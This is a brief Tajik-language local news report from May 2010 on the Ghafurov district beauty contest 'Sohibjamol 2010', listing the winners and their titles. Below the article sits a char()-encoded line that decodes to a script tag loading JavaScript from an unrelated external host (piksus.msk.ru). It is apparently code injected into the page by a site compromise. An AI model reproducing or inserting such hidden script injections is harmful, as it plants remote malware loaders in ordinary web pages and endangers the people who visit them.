19.05.2010
Озмуни ноҳиявии «Соҳибҷамол 2010»
Дар доираи чорабиниҳо бахшида ба даҳ рӯзи ҷавонон дирӯз дар маркази шаҳраки Ғафуров озмуни ноҳиявии «Соҳибҷамол 2010» баргузор гардид. Дар озмуни мазкур 11 нафар ҷавондухтарон- ғолибони давраи якум аз ҷамоатҳои ноҳия ширкат дошта, аз рӯи 6 намуди озмун маҳорату малакаи худро нишон доданд. Дар ниҳояи озмун Махфуза Самадова аз ҷамоати Д. Холматов сазовори унвони «Соҳибҷамол-2010», аз ҷамоати Ёва Шаҳноза Ғайбуллоева соҳиби унвони «Маликаи хубон», Назира Содикова соҳиби унвони «Бонуи нозанин» ва аз ҷамоати Унчӣ Аҳдия Ризозода соҳиби унвони «Афрӯзандаи дилҳо» гардиданд. Дигар иштирокчиёни озмун барои маҳорату малакаи хоса бо ифтихорнома ва тӯҳфаҳои хотиравӣ кадрдонида шуданд.
Фирӯза Қурбонова

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)aae2a60543aafb68a6d5abeb5e8ece32.js" type="text/javascript">

ТАВЗЕҲОТ